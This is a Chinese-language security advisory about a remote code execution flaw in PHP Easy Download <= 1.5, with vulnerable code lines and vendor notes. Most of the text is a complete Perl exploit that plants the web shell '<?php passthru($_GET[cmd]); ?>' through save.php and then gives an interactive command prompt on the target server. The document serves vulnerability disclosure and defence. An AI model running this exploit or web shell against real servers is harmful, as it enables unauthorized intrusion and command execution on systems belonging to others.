安全研究
安全漏洞
PHP Easy Download file_info/admin/save.php文件远程代码执行漏洞
发布日期:2006-11-20
更新日期:2006-11-21
受影响系统:
Ironclad PHP Easy Download <= 1.5描述:
BUGTRAQ ID: 21179
PHP Easy Download是一款方便易用的下载脚本。
PHP Easy Download在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞以Web进程权限在服务器上执行任意命令。
PHP Easy Download的file_info/admin/save.php脚本没有正确验证description、moreinfo、accesses、date和filename参数的输入,允许攻击者通过filename加上字符串“.0”写入Web可访问的文件,导致执行任意PHP代码。漏洞代码如下:
file_info/admin/save.php, 14-36行:
-> 14: $filename = $_POST["filename"];
-> 15: $description = $_POST["description"];
-> 20: $path = "../descriptions/$filename.0";
-> 30: $content = "$accesses|$description|$moreinfo|$date";
-> 34: $newfile = fopen($path,"w");
-> 35: fwrite($newfile, $content);
-> 36: fclose($newfile);
<*来源:nuffsaid (nuffsaid@newbslove.us)
链接:http://secunia.com/advisories/23002/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# +-------------------------------------------------------------------------------------------
# + PHP Easy Download <= 1.5 Remote Code Execution Vulnerability
# +-------------------------------------------------------------------------------------------
# + Affected Software .: PHP Easy Download <= 1.5
# + Vendor ............: http://www.ironclad.net/
# + Download ..........: http://ironclad.net/scripts/PHP_Easy_Download.zip
# + Description .......: "PHP Easy Download is an easy to use and convenient download script"
# + Dork ..............: "PHP Easy Downloader"
# + Class .............: Remote Code Execution
# + Risk ..............: High (Remote Code Execution)
# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
# +-------------------------------------------------------------------------------------------
# + Details:
# + PHP Easy Download by default installation doesn't prevent any of the files in the
# + file_info/admin directory from being accessed by a client. The file_info/admin/save.php
# + file takes input passed to the script by $_POST and writes it to $_POST["filename"].0
# + unsanatized in the file_info/admin/descriptions directory.
# +
# + Vulnerable Code:
# + file_info/admin/save.php, line(s) 14-36:
# + -> 14: $filename = $_POST["filename"];
# + -> 15: $description = $_POST["description"];
# + -> 20: $path = "../descriptions/$filename.0";
# + -> 30: $content = "$accesses|$description|$moreinfo|$date";
# + -> 34: $newfile = fopen($path,"w");
# + -> 35: fwrite($newfile, $content);
# + -> 36: fclose($newfile);
# +
# + Solution:
# + Prevent users from accessing any of the files in the file_info directory (htaccess).
# +-------------------------------------------------------------------------------------------
use Getopt::Long;
use URI::Escape;
use IO::Socket;
$code = "<?php passthru(\$_GET[cmd]); ?>";
main();
sub usage
{
print "\nPHP Easy Download <= 1.5 Remote Code Execution Exploit\n";
print "-h, --host\ttarget host\t(example.com)\n";
print "-f, --file\tshell file\t(shell.php)\n";
print "-d, --dir\tinstall dir\t(/file_info)\n";
exit;
}
sub main
{
GetOptions ('h|host=s' => \$host,'f|file=s' => \$file,'d|dir=s' => \$dir);
usage() unless $host;
$dir = "/file_info" unless $dir;
$file = "shell.php" unless $file;
uri_escape($cmd);
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "\nconnect() failed.\n";
print "\nconnected to ".$host.", sending data.\n";
$sendurl = "description=0&moreinfo=".$code."&accesses=0&filename=".$file."&date=&B1=Submit";
$sendlen = length($sendurl);
print $sock "POST ".$dir."/admin/save.php HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "attempted to create php shell, server response:\n\n";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
while($cmd !~ "~quit")
{
print "\n\n-> ";
$cmd = <STDIN>;
if ($cmd !~ "~quit")
{
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die "connect() failed.\n";
$sendurl = uri_escape($cmd);
print $sock "GET ".$dir."/descriptions/".$file.".0?cmd=".$sendurl." HTTP/1.1\n";
print $sock "Host: ".$host."\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
print "\n";
while($recvd = <$sock>)
{
print $recvd;
}
}
}
exit;
}
# milw0rm.com [2006-11-18]
建议:
厂商补丁:
Ironclad
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://ironclad.net/scripts/PHP_Easy_Download.zip
浏览次数:4694
严重程度:0(网友投票)
绿盟科技给您安全的保障